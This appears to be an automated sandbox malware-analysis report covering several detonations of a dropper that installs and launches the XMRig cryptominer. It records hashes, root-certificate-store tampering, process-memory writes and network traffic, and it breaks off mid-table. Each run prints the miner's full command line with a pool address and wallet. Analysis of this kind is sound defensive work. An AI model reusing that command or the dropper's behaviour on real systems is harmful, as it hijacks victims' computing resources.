| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.179.89.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-22 18:52
Reported
2024-05-22 20:03
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1804s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (binary certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1248 wrote to memory of 1996 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1248 wrote to memory of 1996 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.10.44.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-22 18:52
Reported
2024-05-22 20:03
Platform
win10v2004-20240426-en
Max time kernel
1797s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (binary certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 60 wrote to memory of 5052 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 60 wrote to memory of 5052 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.80.50.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral18
Detonation Overview
Submitted
2024-05-22 18:52
Reported
2024-05-22 20:04
Platform
win10v2004-20240426-en
Max time kernel
1799s
Max time network
1794s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3704 wrote to memory of 4340 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3704 wrote to memory of 4340 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-22 18:52
Reported
2024-05-22 19:41
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2444 wrote to memory of 3152 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2444 wrote to memory of 3152 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3812,i,13640054265074968359,8146127767143474550,262144 --variations-seed-version --mojo-platform-channel-handle=1036 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4184,i,13640054265074968359,8146127767143474550,262144 --variations-seed-version --mojo-platform-channel-handle=2352 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.73.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral5
Detonation Overview
| Submitted | 2024-05-22 18:52 |
| Reported | 2024-05-22 20:03 |
| Platform | win10v2004-20240426-en |
| Max time kernel | 1794s |
| Max time network | 1796s |
| Command Line | |
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1616 wrote to memory of 440 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1616 wrote to memory of 440 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.16.208.104.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral19
Detonation Overview
| Submitted | 2024-05-22 18:52 |
| Reported | 2024-05-22 20:04 |
| Platform | win10v2004-20240508-en |
| Max time kernel | 1795s |
| Max time network | 1786s |
| Command Line | |
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob not preserved in this copy] | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob not preserved in this copy] | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1620 wrote to memory of 1824 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1620 wrote to memory of 1824 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral20
Detonation Overview
| Submitted | 2024-05-22 18:52 |
| Reported | 2024-05-22 20:06 |
| Platform | win10v2004-20240508-en |
| Max time kernel | 1793s |
| Max time network | 1800s |
| Command Line | |
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
